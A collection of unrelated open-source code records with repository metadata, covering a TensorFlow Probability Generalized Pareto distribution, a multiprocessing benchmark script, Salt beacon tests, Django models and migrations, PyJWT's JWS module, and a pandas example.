        magnitude, the more the distribution concentrates near `loc` (for
        `concentration >= 0`) or near `loc - (scale/concentration)` (for
        `concentration < 0`). Floating point `Tensor`.
      validate_args: Python `bool`, default `False`. When `True` distribution
        parameters are checked for validity despite possibly degrading runtime
        performance. When `False` invalid inputs may silently render incorrect
        outputs.
      allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
        (e.g., mean, variance) use the value "`NaN`" to indicate the result is
        undefined. When `False`, an exception is raised if one or more of the
        statistic's batch members are undefined.
      name: Python `str` name prefixed to Ops created by this class.
    Raises:
      TypeError: if `loc`, `scale`, or `concentration` have different dtypes.
    """
    parameters = dict(locals())
    with tf.name_scope(name or 'GeneralizedPareto') as name:
      # All three parameters must share one (possibly promoted) float dtype.
      dtype = dtype_util.common_dtype([loc, scale, concentration],
                                      dtype_hint=tf.float32)
      self._loc = tensor_util.convert_nonref_to_tensor(
          loc, dtype=dtype, name='loc')
      self._scale = tensor_util.convert_nonref_to_tensor(
          scale, dtype=dtype, name='scale')
      self._concentration = tensor_util.convert_nonref_to_tensor(
          concentration, dtype=dtype, name='concentration')
      super(GeneralizedPareto, self).__init__(
          dtype=dtype,
          validate_args=validate_args,
          allow_nan_stats=allow_nan_stats,
          reparameterization_type=reparameterization.FULLY_REPARAMETERIZED,
          parameters=parameters,
          name=name)
  @classmethod
  def _parameter_properties(cls, dtype, num_classes=None):
    # pylint: disable=g-long-lambda
    return dict(
        loc=parameter_properties.ParameterProperties(),
        scale=parameter_properties.ParameterProperties(
            default_constraining_bijector_fn=(
                lambda: softplus_bijector.Softplus(low=dtype_util.eps(dtype)))),
        concentration=parameter_properties.ParameterProperties())
    # pylint: enable=g-long-lambda
  @property
  def loc(self):
    return self._loc
  @property
  def scale(self):
    return self._scale
  @property
  def concentration(self):
    return self._concentration
  def _event_shape(self):
    # Scalar event: each draw is a single real number.
    return []
  def _sample_n(self, n, seed=None):
    # Inversion samples via inverse CDF.
    loc = tf.convert_to_tensor(self.loc)
    scale = tf.convert_to_tensor(self.scale)
    concentration = tf.convert_to_tensor(self.concentration)
    # Pre-broadcast to ensure we draw enough randomness.
    sample_shp = ps.concat(
        [[n],
         self._batch_shape_tensor(
             loc=loc, scale=scale, concentration=concentration)],
        axis=0)
    logu = tf.math.log1p(
        -samplers.uniform(sample_shp, dtype=self.dtype, seed=seed))
    # Double-where trick: substitute 1 for zero concentrations so the
    # division/expm1 branch stays finite, then select the exponential-limit
    # branch (concentration == 0) afterwards.
    eq_zero = tf.equal(concentration, 0)
    safe_conc = tf.where(eq_zero, tf.constant(1, dtype=self.dtype),
                         concentration)
    where_nonzero = loc + scale / safe_conc * tf.math.expm1(-safe_conc * logu)
    where_zero = loc - scale * logu
    return tf.where(eq_zero, where_zero, where_nonzero)
  def _log_prob(self, x):
    scale = tf.convert_to_tensor(self.scale)
    concentration = tf.convert_to_tensor(self.concentration)
    z = self._z(x, scale)
    eq_zero = tf.equal(concentration, 0)  # Concentration = 0 ==> Exponential.
    nonzero_conc = tf.where(eq_zero, tf.constant(1, self.dtype), concentration)
    # Exponent of the density in log-space: y = 1/k + 1; guarded at y == 0
    # to avoid 0 * log1p(...) producing NaN gradients.
    y = 1 / nonzero_conc + tf.ones_like(z, self.dtype)
    where_nonzero = tf.where(
        tf.equal(y, 0), y, y * tf.math.log1p(nonzero_conc * z))
    return -tf.math.log(scale) - tf.where(eq_zero, z, where_nonzero)
  def _log_survival_function(self, x):
    scale = tf.convert_to_tensor(self.scale)
    concentration = tf.convert_to_tensor(self.concentration)
    z = self._z(x, scale)
    eq_zero = tf.equal(concentration, 0)  # Concentration = 0 ==> Exponential.
    nonzero_conc = tf.where(eq_zero, tf.constant(1, self.dtype), concentration)
    where_nonzero = -tf.math.log1p(nonzero_conc * z) / nonzero_conc
    return tf.where(eq_zero, -z, where_nonzero)
  def _log_cdf(self, x):
    # Going through the survival function is more accurate when conc is near
    # zero, because it amounts to computing the (1 + conc * z)**(-1 / conc)
    # term in log-space with log1p.
    # tfp_math.log1mexp(a) accurately computes log(1 - exp(-|a|)). The negation
    # and the absolute value are fine here because the log survival function is
    # always non-positive.
    return tfp_math.log1mexp(self._log_survival_function(x))
  def _z(self, x, scale):
    # Standardize: z = (x - loc) / scale.
    loc = tf.convert_to_tensor(self.loc)
    return (x - loc) / scale
  def _mean(self):
    # Mean is loc + scale / (1 - k); it is only finite for concentration < 1.
    concentration = tf.convert_to_tensor(self.concentration)
    lim = tf.ones([], dtype=self.dtype)
    valid = concentration < lim
    safe_conc = tf.where(valid, concentration, tf.constant(.5, self.dtype))
    result = lambda: self.loc + self.scale / (1 - safe_conc)
    if self.allow_nan_stats:
      return tf.where(valid, result(), tf.constant(float('nan'), self.dtype))
    with tf.control_dependencies([
        assert_util.assert_less(
            concentration,
            lim,
            message='`mean` is undefined when `concentration >= 1`')
    ]):
      return result()
  def _variance(self):
    # Variance is scale^2 / ((1 - k)^2 (1 - 2k)); finite for concentration < 1/2.
    concentration = tf.convert_to_tensor(self.concentration)
    lim = tf.constant(.5, self.dtype)
    valid = concentration < lim
    safe_conc = tf.where(valid, concentration, tf.constant(.25, self.dtype))
    def result():
      answer = self.scale**2 / ((1 - safe_conc)**2 * (1 - 2 * safe_conc))
      # Force broadcasting with self.loc to get the shape right, even though the
      # variance doesn't depend on the location.
      return answer + tf.zeros_like(self.loc)
    if self.allow_nan_stats:
      return tf.where(valid, result(), tf.constant(float('nan'), self.dtype))
    with tf.control_dependencies([
        assert_util.assert_less(
            concentration,
            lim,
            message='`variance` is undefined when `concentration >= 0.5`')
    ]):
      return result()
  def _entropy(self):
    # Differential entropy; broadcast to the batch shape since the value
    # depends only on scale and concentration, not loc.
    ans = tf.math.log(self.scale) + self.concentration + 1
    return tf.broadcast_to(ans, self._batch_shape_tensor())
  # TODO(b/145620027): Finalize choice of bijector.
  def _default_event_space_bijector(self):
    return generalized_pareto_bijector.GeneralizedPareto(
        self.loc,
        scale=self.scale,
        concentration=self.concentration,
        validate_args=self.validate_args)
  def _parameter_control_dependencies(self, is_init):
    if not self.validate_args:
      return []
    assertions = []
    if is_init != tensor_util.is_ref(self.scale):
      assertions.append(
          assert_util.assert_positive(
              self.scale, message='Argument `scale` must be positive.'))
    return assertions
  def _sample_control_dependencies(self, x):
    assertions = []
    if not self.validate_args:
      return assertions
    loc = tf.convert_to_tensor(self.loc)
    scale = tf.convert_to_tensor(self.scale)
    concentration = tf.convert_to_tensor(self.concentration)
    # Support is [loc, inf) for k >= 0 and [loc, loc - scale/k] for k < 0.
    assertions.append(assert_util.assert_greater_equal(
        x, loc, message='Sample must be greater than or equal to `loc`.'))
    assertions.append(assert_util.assert_equal(
        tf.logical_or(tf.greater_equal(concentration, 0),
                      tf.less_equal(x, loc - scale / concentration)),
        True,
        message=('If `concentration < 0`, sample must be less than or '
                 'equal to `loc - scale / concentration`.'),
        summarize=100))
    return assertions
  def _quantile(self, p):
    k = tf.convert_to_tensor(self.concentration)
    m = tf.convert_to_tensor(self.loc)
    s = tf.convert_to_tensor(self.scale)
    is_k_zero = tf.equal(k, 0)
    # Use double where trick to ensure gradient correctness.
    safe_k = tf.where(is_k_zero, tf.ones([], k.dtype), k)
    neglog1mp = -tf.math.log1p(-p)
    return m + s * tf.where(is_k_zero,
                            neglog1mp,
                            tf.math.expm1(k * neglog1mp) / safe_k)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
630141755dcdf5e0317aa3414d0bb6b99e0586e3 | 12b34dcd389dec2095ef454d9dc89976ff7c7215 | /code/one_max_multiprocessing.py | 402d190d1a000a9391c9f19e047fb9994c41ae2f | [] | no_license | mariosky/PPSN2014 | ce0d64a3f61b36b467acab33297481a7e590dcf0 | a2ce8971951e2af311146d74cb043e68ff90cc67 | refs/heads/master | 2020-05-30T12:03:01.086997 | 2014-11-23T17:01:41 | 2014-11-23T17:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | __author__ = 'mariosky'
from multiprocessing import Pool
import one_max
import time, yaml
# Experiment configuration (worker count, sample/population sizes, ...).
# NOTE(review): yaml.load without an explicit Loader is unsafe on untrusted
# input (and deprecated in PyYAML >= 5.1); this trusts the local conf file.
config = yaml.load(open("conf/conf.yaml"))
# Experiment id encodes the key parameters plus a creation timestamp.
experiment = "w%d-%d-p%d" % (config["NUMBER_OF_WORKERS"],config["SAMPLE_SIZE"],config["POPULATION_SIZE"])
experiment_id = experiment + "-%d" % round(time.time(),0)
# Results are appended to a .dat file; the exact config used is archived as YAML.
datafile = open("data/one_max-"+experiment_id+".dat","a")
conf_out = open("conf/one_max-"+experiment_id+".yaml","w")
yaml.dump(config, conf_out)
conf_out.close()
# 30 independent timed runs (Python 2 script -- note the print statements).
for i in range(30):
    print '############################'
    print '############################'
    start = time.time()
    one_max.initialize(config)
    tInitialize = time.time()-start
    print i, tInitialize
    # NOTE(review): a fresh Pool is created per run and never close()d/join()ed,
    # so worker processes accumulate across the 30 iterations.
    p = Pool(config["NUMBER_OF_WORKERS"])
    params = [(w, config) for w in range(config["NUMBER_OF_WORKERS"])]
    start = time.time()
    results = p.map(one_max.work, params)
    #print results
    tTotal = time.time()-start
    # CSV line: run index, total wall time, initialization time.
    totals = "%d,%0.2f,%0.2f" % (i, round(tTotal,2), round(tInitialize,2))
    print totals
    datafile.write(totals + '\n')
    # Flatten per-worker result rows into CSV lines prefixed with the run index.
    for worker_list in results:
        for data_list in worker_list:
            datafile.write(str(i) +"," + ",".join(map(str,data_list)) + '\n')
| [
"mariosky@gmail.com"
] | mariosky@gmail.com |
614d791a27c148a546020e8be0519f9e59df2dd7 | 23f5ef8f31ff54f7166c98f76c00c6fef0dd9caa | /tests/pytests/unit/test_beacons.py | 27940c6f65e5d151e712147a056ff67a91c4cbd1 | [
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] | permissive | afischer-opentext-com/salt | 42bfe2e6e1a86bf8dd30b5a6db4d8e575ac9ca99 | b011a4ed6b29e3d2e8242e5909721dcda75d14df | refs/heads/master | 2022-10-25T00:01:07.138687 | 2021-09-27T16:24:02 | 2021-09-27T16:46:43 | 407,080,050 | 0 | 0 | Apache-2.0 | 2021-09-16T08:12:53 | 2021-09-16T08:12:52 | null | UTF-8 | Python | false | false | 2,476 | py | """
unit tests for the beacon_module parameter
"""
import logging
import salt.config
from tests.support.mock import MagicMock, call, patch
log = logging.getLogger(__name__)
def test_beacon_process():
    """
    Test the process function in the beacon class
    returns the correct information when an exception
    occurs
    """
    mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
    mock_opts["id"] = "minion"
    mock_opts["__role"] = "minion"
    mock_opts["beacons"] = {
        "watch_apache": [
            {"processes": {"apache2": "stopped"}},
            {"beacon_module": "ps"},
        ]
    }

    # Beacon callable that always blows up; process() must surface the
    # exception message in the event payload instead of propagating it.
    beacon_mock = MagicMock(side_effect=Exception("Global Thermonuclear War"))
    # Beacon.process introspects the beacon function's globals; a MagicMock
    # has none, so provide an empty mapping.
    beacon_mock.__globals__ = {}

    beacon = salt.beacons.Beacon(mock_opts, [])
    # Fix: dropped the unused local `found` ("ps.beacon" membership check
    # whose result was never read -- flake8 F841).
    beacon.beacons["ps.beacon"] = beacon_mock

    ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])

    _expected = [
        {
            "tag": "salt/beacon/minion/watch_apache/",
            "error": "Global Thermonuclear War",
            "data": {},
            "beacon_name": "ps",
        }
    ]
    assert ret == _expected
def test_beacon_module():
    """
    Test that beacon_module parameter for beacon configuration
    """
    mock_opts = salt.config.DEFAULT_MINION_OPTS.copy()
    mock_opts["id"] = "minion"
    mock_opts["__role"] = "minion"
    # `beacon_module: ps` routes the `watch_apache` beacon through the real
    # `ps` beacon module.
    mock_opts["beacons"] = {
        "watch_apache": [
            {"processes": {"apache2": "stopped"}},
            {"beacon_module": "ps"},
        ]
    }
    beacon = salt.beacons.Beacon(mock_opts, [])
    ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
    # The emitted event must carry the resolved module name, not the
    # configured beacon id.
    _expected = [
        {
            "tag": "salt/beacon/minion/watch_apache/",
            "data": {"id": "minion", "apache2": "Stopped"},
            "beacon_name": "ps",
        }
    ]
    assert ret == _expected
    # Ensure that "beacon_name" is available in the call to the beacon function
    name = "ps.beacon"
    mocked = {name: MagicMock(return_value=_expected)}
    mocked[name].__globals__ = {}
    # process() is expected to append `_beacon_name` to the configured list
    # before invoking the beacon callable.
    calls = [
        call(
            [
                {"processes": {"apache2": "stopped"}},
                {"beacon_module": "ps"},
                {"_beacon_name": "watch_apache"},
            ]
        )
    ]
    with patch.object(beacon, "beacons", mocked) as patched:
        beacon.process(mock_opts["beacons"], mock_opts["grains"])
        patched[name].assert_has_calls(calls)
| [
"mwilhite@vmware.com"
] | mwilhite@vmware.com |
d3cf863162bbc543d350c11218e6b2157ca672c3 | 23759c9e64e6ce82f4d7472b1f9c027b2d34bdad | /01 - News App(Unfinished)/webapp/main/migrations/0004_auto_20200809_0023.py | 50b59513ae34d90868220ea3c96f81de63aa7d3f | [] | no_license | TanimSk/Django-Archive | 77ce5912da5108ff5fd7d95d4e66d1961a3a5bb9 | 69710877df284a85f7b66e9ddb14b8bbb3c90eef | refs/heads/master | 2023-01-29T15:08:41.478146 | 2020-12-05T09:14:41 | 2020-12-05T09:14:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | # Generated by Django 3.1 on 2020-08-08 18:23
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add `facebook`, `github` and `youtube` text fields to `main_start`.
    Auto-generated by Django (see header comment). Once applied, do not
    hand-edit; create a follow-up migration for further schema changes.
    """
    dependencies = [
        # Must be applied on top of the previous migration of the `main` app.
        ('main', '0003_auto_20200807_1810'),
    ]
    operations = [
        migrations.AddField(
            model_name='main_start',
            name='facebook',
            field=models.TextField(default='-'),
        ),
        migrations.AddField(
            model_name='main_start',
            name='github',
            field=models.TextField(default='-'),
        ),
        migrations.AddField(
            model_name='main_start',
            name='youtube',
            field=models.TextField(default='-'),
        ),
    ]
| [
"61817579+baseplate-admin@users.noreply.github.com"
] | 61817579+baseplate-admin@users.noreply.github.com |
9ea3047f9eafa6f106e1402425b14554e09a4be8 | 962fb0927fd2dc998f17a59809b0a508bb043ec0 | /tests/test_app.py | 0351d91848f829e2d4c0cab03b15c6faffbc6b66 | [
"MIT"
] | permissive | mozillazg/tinyq | 9653680c20e00cf973df68cd1c7224a5d8380dcf | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | refs/heads/master | 2023-08-23T21:18:37.207385 | 2017-06-19T14:03:06 | 2017-06-19T14:03:06 | 72,210,812 | 14 | 2 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | # -*- coding: utf-8 -*-
def test_app_delay(app):
    """delay() must enqueue exactly one job that can then be dequeued."""
    @app.task()
    def count(x, y):
        return x + y
    # Schedule instead of executing: exactly one key should appear in the
    # queue's backing store, and it must be retrievable via dequeue().
    count.delay(1, 2)
    assert len(app.schedule_queue.connection.keys('*')) == 1
    assert app.schedule_queue.dequeue()
def test_app_call(app):
    """Calling a task function directly runs it synchronously, queueing nothing."""
    @app.task()
    def count(a, b):
        return a + b
    # A plain call executes the body immediately and returns its value.
    assert count(1, 2) == 3
    # Nothing was scheduled, so the backing store must hold no keys.
    remaining = len(app.schedule_queue.connection.keys('*'))
    assert remaining == 0
| [
"mozillazg101@gmail.com"
] | mozillazg101@gmail.com |
67569ed3a331217728b35b752ffc10ee42b26f69 | 7394e662a54b5df7307dc0f7a0a7d4ef4d1c045f | /event/models.py | 582a91fee88950db874c607e4109f7b03de98e24 | [] | no_license | Aman563/spectrum-server | a16660c043d7c98a80cf94296e9535cab50e9297 | f41cc13735f1e3a79f22be380bb9ed55489bed03 | refs/heads/master | 2020-04-21T20:58:33.367627 | 2018-01-23T14:34:24 | 2018-01-23T14:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
from register.models import UserData
class EventData(models.Model):
    """A single fest event: naming, round info, artwork, schedule and prizes."""
    name = models.CharField(max_length=120, blank=True, null=True)
    round_name = models.CharField(max_length=120, blank=True, null=True)
    # rules = models.CharField(max_length=800, blank=True, null=True)
    # Three renditions of the event artwork; all share the same default image.
    image = models.ImageField(upload_to='event/', default="/media/event/default.png")
    image_blur = models.ImageField(upload_to='event/', default="/media/event/default.png")
    image_landscape = models.ImageField(upload_to='event/', default="/media/event/default.png")
    # Schedule is stored as free-form text rather than Date/DateTime fields.
    time = models.CharField(max_length=120, blank=True, null=True)
    date = models.CharField(max_length=255, blank=True, null=True)
    # NOTE(review): `type` (and `round` below) shadow Python builtins; renaming
    # would require a schema migration, so they are only documented here.
    type = models.IntegerField(default=1, blank=True, null=True)
    location = models.CharField(max_length=120, blank=True, null=True)
    day = models.IntegerField(default=0, blank=True, null=True)
    attendees = models.IntegerField(default=0, blank=True, null=True)
    # description = models.CharField(max_length=800, blank=True, null=True)
    prize_description = models.CharField(max_length=120, blank=True, null=True)
    round = models.IntegerField(default=1, blank=True, null=True)
    facebook_url = models.CharField(max_length=255, blank=True, null=True)
    rules = models.TextField(max_length=1000, null=True, blank=True, default="")
    description = models.TextField(max_length=1000, null=True, blank=True, default="")
    # Bookkeeping timestamps: `modified` refreshes on every save, `created` once.
    modified = models.DateTimeField(auto_now=True, auto_now_add=False)
    created = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __unicode__(self):
        # Python 2-style string representation: the event name.
        return self.name
class UserEventData(models.Model):
    """Join record linking a user to an event they registered for."""
    user = models.ForeignKey(UserData, null=True)
    event = models.ForeignKey(EventData, null=True)
    # NOTE(review): appears to be a 0/1 participation flag stored as an
    # IntegerField rather than a BooleanField -- confirm against callers.
    participated = models.IntegerField(default=0, blank=True, null=True)
    modified = models.DateTimeField(auto_now=True, auto_now_add=False)
    created = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __unicode__(self):
        # Display the linked user's name, not the event.
        return self.user.name
class OrganiserData(models.Model):
    """Contact person (name + mobile number) responsible for an event."""
    name = models.CharField(max_length=120, blank=True, null=True)
    mobile = models.CharField(max_length=120, blank=True, null=True)
    event = models.ForeignKey(EventData, null=True)
    modified = models.DateTimeField(auto_now=True, auto_now_add=False)
    created = models.DateTimeField(auto_now=False, auto_now_add=True)
    def __unicode__(self):
        return self.name
| [
"ujjwal.iitism@gmail.com"
] | ujjwal.iitism@gmail.com |
ddfc0ba313bcc76af69e40d2021eb67ef443f3b8 | f3f616801184633a40d767c7f71b3e375fd166d1 | /hackerearth/events/june_circuits/set-2/little_boruto_and_rail_ways/test.py | d1209cc7da862a3d413d6c58a2469cbd1232519c | [
"MIT"
] | permissive | amarish-kumar/coding-challenges | cf0668114929c4cccd92944c1b8cb9c6e029ab9d | d5f998c738058d06a0217fb54f9f03a646384bce | refs/heads/master | 2020-03-21T10:26:08.919197 | 2017-05-20T13:58:50 | 2017-05-20T13:58:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | from unittest import TestCase, main as ut_main
import solution as sol
class TestSolution(TestCase):
    """Unit tests for the disjoint-graph helpers in the `solution` module.
    NOTE(review): written for Python 2 -- `map(...)` results are compared
    directly against lists below, which only holds when `map` returns a list.
    """
    def test_detect_disjoint_graph(self):
        n = 3
        edges = [[1, 2], [2, 3]]
        graph, nodes = self.make_graph_and_node_list(n, edges)
        # Edges 1-2 and 2-3 connect all three nodes into one component
        # (expectations use 1-based node ids, hence start1()).
        self.assertEqual(self.start1(sol.detect_disjoint_graph(nodes, graph, n)), [1, 2, 3])
    def make_graph_and_node_list(self, n, edges):
        # Build the adjacency structure plus the 0-based node id list [0..n).
        graph = sol.make_graph_from_edges(n, edges)
        nodes = map(lambda i : i, range(0, n))
        return graph, nodes
    def start1(self, nodes):
        # Shift 0-based node ids to the 1-based ids used in expectations.
        return map(lambda i : i + 1, nodes)
    def test_get_all_disjoint_graphs(self):
        def test(n, edges, result):
            graph, _ = self.make_graph_and_node_list(n, edges)
            graphs = map(self.start1, sol.get_all_disjoint_graphs(graph, n))
            self.assertEqual(graphs, result)
        test(3, [[1, 2]], [[1, 2], [3]])
        test(3, [[1, 2], [2, 3]], [[1, 2, 3]])
        test(5, [[1, 2], [2, 3]], [[1, 2, 3], [4], [5]])
        test(5, [[1, 2], [2, 3], [4, 5]], [[1, 2, 3], [4, 5]])
        # No edges: every node forms its own singleton component.
        test(5, [], map(lambda i : [i], range(1, 6)))
if __name__ == '__main__':
ut_main()
| [
"babaiscool@gmail.com"
] | babaiscool@gmail.com |
523cecdfdf690e90f4c33ca6a4f3482ee0066c0b | 6d4c5e79bb36785d5bb127e263aac50cb6729a88 | /venv/Lib/site-packages/jwt/api_jws.py | 5accb1b50077b0d06551fb01ff2c4efebc8b14cc | [] | no_license | Galymbekov/BackWebDevProject | a7683fc205d467629f4ad132370ff4b5ac535277 | 3343fd277bc8994bec3d484072a8ed5f1d99b6bb | refs/heads/main | 2023-04-14T14:06:13.888793 | 2021-04-30T12:12:37 | 2021-04-30T12:12:37 | 362,004,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,095 | py | import binascii
import json
import warnings
try:
# import required by mypy to perform type checking, not used for normal execution
from typing import Callable, Dict, List, Optional, Union # NOQA
except ImportError:
pass
from .algorithms import (
Algorithm, get_default_algorithms, has_crypto, requires_cryptography # NOQA
)
from .compat import Mapping, binary_type, string_types, text_type
from .exceptions import (
DecodeError, InvalidAlgorithmError, InvalidSignatureError,
InvalidTokenError
)
from .utils import base64url_decode, base64url_encode, force_bytes, merge_dict
class PyJWS(object):
    """Creates and verifies JSON Web Signatures (JWS) over raw byte payloads.
    Maintains a registry of signing algorithms (optionally restricted to a
    whitelist passed at construction time) and implements the compact
    serialization `header.payload.signature`.
    """
    header_typ = 'JWT'
    def __init__(self, algorithms=None, options=None):
        self._algorithms = get_default_algorithms()
        self._valid_algs = (set(algorithms) if algorithms is not None
                            else set(self._algorithms))
        # Remove algorithms that aren't on the whitelist
        for key in list(self._algorithms.keys()):
            if key not in self._valid_algs:
                del self._algorithms[key]
        if not options:
            options = {}
        self.options = merge_dict(self._get_default_options(), options)
    @staticmethod
    def _get_default_options():
        return {
            'verify_signature': True
        }
    def register_algorithm(self, alg_id, alg_obj):
        """
        Registers a new Algorithm for use when creating and verifying tokens.
        """
        if alg_id in self._algorithms:
            raise ValueError('Algorithm already has a handler.')
        if not isinstance(alg_obj, Algorithm):
            raise TypeError('Object is not of type `Algorithm`')
        self._algorithms[alg_id] = alg_obj
        self._valid_algs.add(alg_id)
    def unregister_algorithm(self, alg_id):
        """
        Unregisters an Algorithm for use when creating and verifying tokens
        Throws KeyError if algorithm is not registered.
        """
        if alg_id not in self._algorithms:
            raise KeyError('The specified algorithm could not be removed'
                           ' because it is not registered.')
        del self._algorithms[alg_id]
        self._valid_algs.remove(alg_id)
    def get_algorithms(self):
        """
        Returns a list of supported values for the 'alg' parameter.
        """
        return list(self._valid_algs)
    def encode(self,
               payload,  # type: Union[Dict, bytes]
               key,  # type: str
               algorithm='HS256',  # type: str
               headers=None,  # type: Optional[Dict]
               json_encoder=None  # type: Optional[Callable]
               ):
        segments = []
        # `algorithm=None` means an unsecured token using the 'none' algorithm.
        if algorithm is None:
            algorithm = 'none'
        # NOTE(review): dead branch -- an unsupported algorithm is NOT rejected
        # here; it only surfaces below as NotImplementedError via the KeyError
        # handler around the signing step.
        if algorithm not in self._valid_algs:
            pass
        # Header
        header = {'typ': self.header_typ, 'alg': algorithm}
        if headers:
            self._validate_headers(headers)
            header.update(headers)
        json_header = force_bytes(
            json.dumps(
                header,
                separators=(',', ':'),
                cls=json_encoder
            )
        )
        segments.append(base64url_encode(json_header))
        segments.append(base64url_encode(payload))
        # Segments
        signing_input = b'.'.join(segments)
        try:
            alg_obj = self._algorithms[algorithm]
            key = alg_obj.prepare_key(key)
            signature = alg_obj.sign(signing_input, key)
        except KeyError:
            if not has_crypto and algorithm in requires_cryptography:
                raise NotImplementedError(
                    "Algorithm '%s' could not be found. Do you have cryptography "
                    "installed?" % algorithm
                )
            else:
                raise NotImplementedError('Algorithm not supported')
        segments.append(base64url_encode(signature))
        return b'.'.join(segments)
    def decode(self,
               jwt,  # type: str
               key='',   # type: str
               verify=True,  # type: bool
               algorithms=None,  # type: List[str]
               options=None,  # type: Dict
               **kwargs):
        merged_options = merge_dict(self.options, options)
        verify_signature = merged_options['verify_signature']
        # Decoding without pinning `algorithms` is dangerous (algorithm
        # confusion attacks), hence the deprecation warning below.
        if verify_signature and not algorithms:
            warnings.warn(
                'It is strongly recommended that you pass in a ' +
                'value for the "algorithms" argument when calling decode(). ' +
                'This argument will be mandatory in a future version.',
                DeprecationWarning
            )
        payload, signing_input, header, signature = self._load(jwt)
        if not verify:
            warnings.warn('The verify parameter is deprecated. '
                          'Please use verify_signature in options instead.',
                          DeprecationWarning, stacklevel=2)
        elif verify_signature:
            self._verify_signature(payload, signing_input, header, signature,
                                   key, algorithms)
        return payload
    def get_unverified_header(self, jwt):
        """Returns back the JWT header parameters as a dict()
        Note: The signature is not verified so the header parameters
        should not be fully trusted until signature verification is complete
        """
        headers = self._load(jwt)[2]
        self._validate_headers(headers)
        return headers
    def _load(self, jwt):
        # Split a compact serialization (header.payload.signature) into its
        # decoded parts, raising DecodeError on any malformed segment.
        if isinstance(jwt, text_type):
            jwt = jwt.encode('utf-8')
        if not issubclass(type(jwt), binary_type):
            raise DecodeError("Invalid token type. Token must be a {0}".format(
                binary_type))
        try:
            signing_input, crypto_segment = jwt.rsplit(b'.', 1)
            header_segment, payload_segment = signing_input.split(b'.', 1)
        except ValueError:
            raise DecodeError('Not enough segments')
        try:
            header_data = base64url_decode(header_segment)
        except (TypeError, binascii.Error):
            raise DecodeError('Invalid header padding')
        try:
            header = json.loads(header_data.decode('utf-8'))
        except ValueError as e:
            raise DecodeError('Invalid header string: %s' % e)
        if not isinstance(header, Mapping):
            raise DecodeError('Invalid header string: must be a json object')
        try:
            payload = base64url_decode(payload_segment)
        except (TypeError, binascii.Error):
            raise DecodeError('Invalid payload padding')
        try:
            signature = base64url_decode(crypto_segment)
        except (TypeError, binascii.Error):
            raise DecodeError('Invalid crypto padding')
        return (payload, signing_input, header, signature)
    def _verify_signature(self, payload, signing_input, header, signature,
                          key='', algorithms=None):
        # The `alg` value is attacker-controlled; it must be in the caller's
        # allow-list before any cryptographic work happens.
        alg = header.get('alg')
        if algorithms is not None and alg not in algorithms:
            raise InvalidAlgorithmError('The specified alg value is not allowed')
        try:
            alg_obj = self._algorithms[alg]
            key = alg_obj.prepare_key(key)
            if not alg_obj.verify(signing_input, key, signature):
                raise InvalidSignatureError('Signature verification failed')
        except KeyError:
            raise InvalidAlgorithmError('Algorithm not supported')
    def _validate_headers(self, headers):
        if 'kid' in headers:
            self._validate_kid(headers['kid'])
    def _validate_kid(self, kid):
        if not isinstance(kid, string_types):
            raise InvalidTokenError('Key ID header parameter must be a string')
# Module-level PyJWS singleton plus convenience aliases, so callers can use
# module-level encode()/decode() without instantiating their own object.
_jws_global_obj = PyJWS()
encode = _jws_global_obj.encode
decode = _jws_global_obj.decode
register_algorithm = _jws_global_obj.register_algorithm
unregister_algorithm = _jws_global_obj.unregister_algorithm
get_unverified_header = _jws_global_obj.get_unverified_header
| [
"47265977+Galymbekov@users.noreply.github.com"
] | 47265977+Galymbekov@users.noreply.github.com |
eb6cddd566669ce91d865ba2e42ef6b5cef7277d | 517a904955033092aec11288151d725548226abc | /pandas_tutorial/data_io/to_json.py | a0ffb8e0237c8dd06a3f62e4a2bca9ba237e9763 | [] | no_license | MinSu-Kim/python_tutorial | ae0a4e3570aa4cb411626cefbc031777364764d5 | ed0c08892822d7054161c9e8f98841370868e82d | refs/heads/master | 2021-06-16T16:15:30.349719 | 2021-05-26T04:59:47 | 2021-05-26T04:59:47 | 207,266,202 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | import pandas as pd
# Build a DataFrame with the pandas DataFrame() constructor and store it in df.
data = {'name': ['Jerry', 'Riah', 'Paul'],
        'algol': ["A", "A+", "B"],
        'basic': ["C", "B", "B+"],
        'c++': ["B+", "C", "C+"],
        }
df = pd.DataFrame(data)
df.set_index('name', inplace=True)  # use the 'name' column as the index
print(df)
print("# to_json() 메소드를 사용하여 JSON 파일로 내보내기. 파열명은 df_sample.json로 저장")
# Export the DataFrame to JSON in the current working directory.
df.to_json("./df_sample.json")
"net94.teacher@gmail.com"
] | net94.teacher@gmail.com |
fa10145e9aa1763d721507e88caccee956b9b069 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_snag.py | 346b4d7003fc041b6b0c9bffbf125482ebf69e9b | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
#calss header
class _SNAG():
def __init__(self,):
self.name = "SNAG"
self.definitions = [u'a problem, difficulty, or disadvantage: ', u'a tear, hole, or loose thread in a piece of clothing or cloth caused by a sharp or rough object: ', u'informal for sausage ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
